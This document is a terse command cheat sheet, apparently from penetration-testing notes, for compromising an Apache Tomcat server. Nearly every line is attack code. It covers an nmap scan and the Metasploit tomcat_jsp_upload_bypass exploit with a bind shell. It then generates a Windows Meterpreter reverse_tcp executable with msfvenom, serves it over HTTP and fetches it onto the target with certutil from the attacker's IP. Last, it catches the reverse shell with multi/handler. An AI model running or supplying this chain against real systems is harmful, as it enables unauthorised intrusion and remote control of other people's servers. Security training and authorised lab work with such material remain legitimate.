Apache Tomcat Web Server
nmap -sS -sV -O [IP]
msfconsole -q
setg RHOSTS [IP]
search type:exploit tomcat_jsp
use exploit/multi/http/tomcat_jsp_upload_bypass
show options
set payload java/jsp_shell_bind_tcp
set SHELL cmd
exploit
sessions
# search shell_to_meterpreter
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[ATTACK IP] LPORT=[PORT] -f exe > meterpreter.exe
sudo python -m SimpleHTTPServer 80
sessions 1
certutil -urlcache -f [ATTACKIP]/meterpreter.exe meterpreter.exe
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST [ATTACK IP]
set LPORT [PORT]
run
.\meterpreter.exeLast updated